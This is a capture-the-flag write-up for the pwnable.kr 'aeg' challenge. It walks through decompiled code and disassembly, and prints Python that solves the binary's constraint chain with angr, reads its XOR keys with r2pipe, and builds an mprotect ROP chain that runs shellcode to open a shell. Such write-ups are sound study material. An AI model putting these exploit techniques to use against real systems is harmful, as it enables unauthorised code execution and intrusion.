pwnable.kr: aeg (550)

We are given an endpoint which we can connect to. The endpoint gives the following banner right after we connected:

---------------------------------------------------
-  Welcome to AEG (Automatic Exploit Generation)  -
---------------------------------------------------
I will send you a newly compiled binary (probably exploitable) in base64 format
after you get the binary, I will be waiting for your input as a plain text
when your input is given, I will execute the binary with your input as argv[1]
you have 10 seconds to build exploit payload
wait...

Oh hey wow, we need to create an automatic exploit generation program. Cool. After 10 seconds, the server then give us a base64 decoded gzip-ed ELF binary. The binary will be different everytime we connect it, thus we cannot just pwn it locally then point our script to throw the payload into the server.

Since it seems that they randomized things in a source code and then compiled it as ELF, I'm pretty sure the binary will have some persistent structure. Let's look at the binary from sample binary in IDA.

__int64 __fastcall main(int argc, char **argv, char **envp)
{
  __int64 result; // rax@2
  unsigned int v4; // eax@3
  int v5; // eax@6
  int v6; // eax@12
  int v7; // eax@16
  char v8; // [sp+10h] [bp-20h]@6
  char v9; // [sp+11h] [bp-1Fh]@6
  char v10; // [sp+12h] [bp-1Eh]@6
  int i; // [sp+18h] [bp-18h]@8
  int v12; // [sp+1Ch] [bp-14h]@11
  int v13; // [sp+20h] [bp-10h]@10
  int v14; // [sp+24h] [bp-Ch]@9
  int v15; // [sp+28h] [bp-8h]@5
  int v16; // [sp+2Ch] [bp-4h]@5

  if ( argc == 2 )
  {
    v4 = sub_8034990(1LL, 2LL, 3LL, 4LL, 5LL, 6LL);
    srand(v4);
    half_arglen = strlen(argv[1]) >> 1;
    if ( half_arglen <= 1000 )
    {
      v16 = 0;
      v15 = 0;
      while ( 2 * half_arglen > v16 )
      {
    v8 = argv[1][v16];
    v9 = argv[1][v16 + 1];
    v10 = 0;
    v5 = v15++;
    __isoc99_sscanf(&v8, "%02x", &input_buffer[(signed __int64)v5]);
    v16 += 2;
      }
      for ( i = 0; i < half_arglen; ++i )
      {
    if ( (_BYTE)v14 == 218 && (_BYTE)v13 == -9 && 66 * (_BYTE)v14 + 73 * (_BYTE)v13 - (_BYTE)v12 == 81 )
    {
      v6 = v14++;
      v13 = v6;
    }
    if ( (_BYTE)v14 == -7 && (_BYTE)v13 == 107 && 29 * (_BYTE)v13 + 31 * (_BYTE)v14 - (_BYTE)v12 == 92 )
    {
      v7 = v12++;
      v14 = v7;
    }
    if ( i & 1 )
      input_buffer[(signed __int64)i] ^= 0x36u;
    else
      input_buffer[(signed __int64)i] ^= 0x76u;
    if ( (_BYTE)v14 == -24 && (_BYTE)v13 == -23 && 86 * (_BYTE)v13 + 51 * (_BYTE)v14 - (_BYTE)v12 == 74 )
      v14 = v13 + v12;
    if ( (_BYTE)v14 == -38 && (_BYTE)v13 == -9 && 66 * (_BYTE)v14 + 73 * (_BYTE)v13 - (_BYTE)v12 == 81 )
      v13 = v14 - v12;
      }
      puts("payload encoded. let's go!");
      go(input_buffer[0], byte_82373A1, byte_82373A2);
      puts("end of program");
      result = 0LL;
    }
    else
    {
      puts("payload length exceeds 1000byte");
      result = 0LL;
    }
  }
  else
  {
    puts("usage : ./aeg [hex encoded payload]");
    result = 0LL;
  }
  return result;
}

It seems that our input will be encoded by xor with 0x36/0x76 depending on the index, and then it will call some functions with our encoded input.

char __fastcall go(char a1, char a2, char a3)
{
  char result; // al@1

  result = a3;
  if ( a1 == -19 )
  {
    result = -22 - a2;
    if ( a2 == -105 )
    {
      result = 22 * a1 + 3 * a2 - a3;
      if ( result == 96 )
    result = sub_8034876(byte_82373A3, byte_82373A4, byte_82373A5);
    }
  }
  return result;
}

Basically there's 16 functions like these, each having 3 parameters. The function will proceed to call the next function if the 3 variables satisfy some kind of constraint. The last function called by the 16th function looked like this:

void *sub_803419C()
{
  char dest; // [sp+0h] [bp-40h]@1

  return memcpy(&dest, &after_input, half_arglen - 48);
}

It's just plain old buffer overflow vulnerability. So basically, what we need to do is have our payload prefixed by some value that will satisfy the constraints imposed by preceeding functions i.e. <prefix><payload>.

There's also sub_8034990() function which is weird if you see it at first because just accept 1 through 6 as arguments and it does nothing after that.

__int64 sub_803496D()
{
  return 0LL;
}

__int64 __fastcall sub_8034990(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, __int64 a6)
{
  return (unsigned int)sub_803496D();
}

But the disassembly version say something different:

/ (fcn) fcn.0803496d 35
| 0x0803496d      55                       push rbp
| 0x0803496e      4889e5                   mov rbp, rsp
| 0x08034971      48897db8                 mov qword [rbp-0x48], rdi
| 0x08034975      488975b0                 mov qword [rbp-0x50], rsi
| 0x08034979      488955a8                 mov qword [rbp-0x58], rdx
| 0x0803497d      48894da0                 mov qword [rbp-0x60], rcx
| 0x08034981      4c894598                 mov qword [rbp-0x68], r8
| 0x08034985      4c894d90                 mov qword [rbp-0x70], r9
| 0x08034989      b800000000               mov eax, 0
| 0x0803498e      5d                       pop rbp
\ 0x0803498f      c3                       ret
/ (fcn) fcn.08034990 78
| 0x08034990      55                       push rbp
| 0x08034991      4889e5                   mov rbp, rsp
| 0x08034994      4883ec70                 sub rsp, 0x70               ; 'p'
| 0x08034998      48897db8                 mov qword [rbp-0x48], rdi
| 0x0803499c      488975b0                 mov qword [rbp-0x50], rsi
| 0x080349a0      488955a8                 mov qword [rbp-0x58], rdx
| 0x080349a4      48894da0                 mov qword [rbp-0x60], rcx
| 0x080349a8      4c894598                 mov qword [rbp-0x68], r8
| 0x080349ac      4c894d90                 mov qword [rbp-0x70], r9
| 0x080349b0      4c8b45a0                 mov r8, qword [rbp-0x60]
| 0x080349b4      488b7d90                 mov rdi, qword [rbp-0x70]
| 0x080349b8      488b4d98                 mov rcx, qword [rbp-0x68]
| 0x080349bc      488b55b0                 mov rdx, qword [rbp-0x50]
| 0x080349c0      488b75a8                 mov rsi, qword [rbp-0x58]
| 0x080349c4      488b45b8                 mov rax, qword [rbp-0x48]
| 0x080349c8      4d89c1                   mov r9, r8
| 0x080349cb      4989f8                   mov r8, rdi
| 0x080349ce      4889c7                   mov rdi, rax
| 0x080349d1      e897ffffff               call fcn.0803496d           ;[1]
| 0x080349d6      8945fc                   mov dword [local_4h], eax
| 0x080349d9      8b45fc                   mov eax, dword [local_4h]
| 0x080349dc      c9                       leave
\ 0x080349dd      c3                       ret

The fun thing with this is function is, it can loads arguments to the registers. This will be useful as a gadget when we're crafting ROP as the binary is in 64-bit (in which the arguments are passed through registers, not stack).

But there's a catch, there's some parts of the binary that will be randomized.

  1. The xor value.
  2. The PADDING for xor line (those cryptic ifs around the xor line).
  3. The dest file size (which determines the padding needed before rop addresses).
  4. The offset from rbp for loading arguments in the gadget.

Constraint Solver

Prior solving the challenge, I've heard of constraint solver called z3. I'm not really familiar with z3 but it's been used to solve problems where we need to search for the input, given the output and the operations to the input.

Unfortunately, extracting the constraint from the disassembly with regex might be too tedious. Instead, I look up for another solution which utilizes z3. The popular use of z3 in CTFs is usually using angr. After looking through the documentation for some time, I decided to try using angr to solve the constraints using angr. The result is pretty bad code and utilization of angr (as I've seen a better code with it later), but it works.

def solve_with_angr(bin_name):
    p = angr.Project(bin_name, auto_load_libs=True)
    cfg = p.analyses.CFGFast(regions=[(p.entry, p.loader.main_object.max_addr)], force_complete_scan=False)

    # find main and start of function checks
    init_state = p.factory.full_init_state()
    sm = p.factory.simulation_manager(init_state)
    sm.explore(find=p.entry+0x24)
    sm.move(from_stash='found', to_stash='active')
    main = sm.active[0].solver.eval(sm.active[0].regs.rdi)
    main_func = cfg.functions.function(main)
    chain_start = sorted(main_func.get_call_sites())[-2]
    chain_addr = main_func.get_call_target(chain_start)

    args = []
    while len(args) < 0x30:
    a = claripy.BVS('a', 8)
    b = claripy.BVS('b', 8)
    c = claripy.BVS('c', 8)

    cur_state = p.factory.call_state(chain_addr, a, b, c)
    sm = p.factory.simulation_manager(cur_state)

    chain_func = cfg.functions.function(chain_addr)
    chain_next = chain_func.get_call_sites()[0]

    sm.explore(find=chain_next)
    args.append(chr(sm.found[0].solver.eval(a)))
    args.append(chr(sm.found[0].solver.eval(b)))
    args.append(chr(sm.found[0].solver.eval(c)))

    chain_addr = chain_func.get_call_target(chain_next)

    last_state = p.factory.call_state(chain_addr)
    sm = p.factory.simulation_manager(last_state)
    sm.explore(find=chain_addr+0x20)
    pad_size = sm.found[0].solver.eval(sm.found[0].regs.rbp-sm.found[0].regs.rdi)

    return (pad_size, ''.join(args))

The function returns a tupple of the padding size needed at the exploitable function and the prefix needed to reach the function. Cool, huh?.

Reading the XOR values

I should've been able to extract the XOR values using angr too. Sadly, I didn't know how to use angr properly when I worked on this problem so I need to extract the XOR values directly from the disassembly. For that, I use r2pipe, which is a python binding to interact with radare2 directly. Neat!

def get_two_xor(bin_name):
    r2 = r2pipe.open(bin_name)
    r2.cmd('aaa')
    main_disas = r2.cmd('pdf @ main')
    pattern = re.compile('xor eax, (.*)')
    return tuple([int(m.group(1), 16) & 0xff for m in re.finditer(pattern, main_disas)])

ROP crafting

Now, it's the headache part. The binary is dynamically linked so we can't create ROP chain out of thin air with ROPgadget. At first, I tried to leak the address of some functions using puts and then we can point to system. Unfortunately, it also run on top some other process, which will print stdout ONLY if it execute cleanly. To make it worse, there's no relocation for exit() so we can't call it.

At this point, I'm already frustrated to the point I want to search for solutions online, when I look at the list functions and there's one that I'm don't know what it does. The function is called mprotect(). After looking quickly through the manual page, it seems that mprotect() can change the protection on some mapped memory region. Great, so we can use this to set our buffer as executable and jump to it to get a shell. Let's try to use mprotect().

We will construct ROP payload which will load some arguments for mprotect (using the mentioned gadget), then jump to mprotect to change the protection, and then jump to our shellcode. Because we don't know the stack address, we can't change the protection for it. Instead, we'll use our input buffer right after it was encoded. The input buffer is static in BSS section, so we know the address. We can only change the input buffer, so we'll put the shellcode inside the input buffer. Also, because we need to know the rbp so the gadget can load our arguments, we also need to use the input buffer to put the arguments to mprotect(). The rop payload will be in the input buffer because the load parameter gadget changes the rsp to our fake rbp.

So, the ropchain payload in the buffer overflow will be <fake rbp><jump to load parameter>, which will allow the program to load arguments to registers. After that, the ropchain payload is coming from the input buffer. The layout of the ropchain payload in the input buffer will be input|pad|shellcode|pad|arguments. Some weird things happened if we use said layout.

Apparently, mprotect() use xsave [rsp+0x40] instruction that messes up our payload. I don't really know what it does, but a quick look at Intel reference manual tell us that it:

Performs a full or partial save of processor state components to the XSAVE area located at the memory address specified by the destination operand.

It's weird because it shouldn't mess with our payload. The rsp register will point to some weird memory location outside of the buffer, but when we step right into the instruction, our payload become scattered. The instruction seems to work at page-level, but we can't separate the shellcode page and buffer page because our input is limited to 1000 bytes (usual page is 4K in size).

I'm frustrated again at this point and I just shuffle around the payload and I came up with the input|pad|arguments|pad|shellcode layout.

AND. IT. SUDDENLY. WORKS.

I don't know what really happened here, but it works. Running the script pointed to the game endpoint gives us a shell that we can use to get the flag. Here's the final ROP script:

def craft_rop(bin_name):
    r2 = r2pipe.open(bin_name)
    r2.cmd('e asm.varsub = false')
    r2.cmd('aaa')

    main_disas = r2.cmd('pdf@main')
    helper_func = disas_regex('call (fcn\..*)', main_disas)

    helper_disas = r2.cmd('pdf@{}'.format(helper_func))
    param_loader = disas_regex_addr('.*(0x[0-9a-f]+).*mov .*, qword .*', helper_disas)

    buffer_address = disas_regex_addr('lea rdx, \[rax \+ (0x[0-9a-f]+)\]', main_disas)

    overflow_size, prefix_to_vuln = solve_with_angr(bin_name)

    # payload layout
    rbp_off = 0x100
    rbp_addr = buffer_address + rbp_off
    sc_off = 0x200
    sc_addr = buffer_address + sc_off

    sc = asm(shellcraft.sh())
    # setup parameter address
    # puzzle args, point rbp to rbp_addr which serve to store mprotect argument
    rop = ''
    rop += prefix_to_vuln
    rop += cyclic(overflow_size)
    rop += pack(buffer_address+rbp_off) + pack(param_loader)

    # at rbp layout
    # r8, rdi, rcx, rdx, rsi, rax
    # r9 (= r8), r8 (= rdi), rdi (= rax)
    # pad to rbp offset
    rop += cyclic(rbp_off-len(rop))
    rdi_off = rbp_off - disas_regex_addr('mov rax, qword \[rbp - (0x[0-9a-f]+)\]', helper_disas)
    rsi_off = rbp_off - disas_regex_addr('mov rsi, qword \[rbp - (0x[0-9a-f]+)\]', helper_disas)
    rdx_off = rbp_off - disas_regex_addr('mov rdx, qword \[rbp - (0x[0-9a-f]+)\]', helper_disas)
    rdi_arg = pack( (buffer_address + sc_off) & 0xfffffffffffff000 )
    rsi_arg = pack(0x1000)
    rdx_arg = pack(0x7)
    rop = rop[:rdi_off] + rdi_arg + rop[rdi_off+len(rdi_arg):]
    rop = rop[:rsi_off] + rsi_arg + rop[rsi_off+len(rsi_arg):]
    rop = rop[:rdx_off] + rdx_arg + rop[rdx_off+len(rdx_arg):]

    # construct ropchain to mprotect then to shellcode
    elf = ELF(bin_name)
    r = ROP(elf)
    r.raw(rbp_addr)
    r.raw(elf.symbols['mprotect'])
    r.raw(sc_addr)
    rop += r.chain()

    # at sc layout
    # pad to sc offset, then add shellcode
    rop += cyclic(sc_off-len(rop))
    rop += sc

    return rop

I guess I'll study what xsave mem next. But hey, at least I get the flag ;).

Note: I can't give the full solver script as it's against pwnable.kr rule

Related Posts

pwnable.kr: rootkit (400)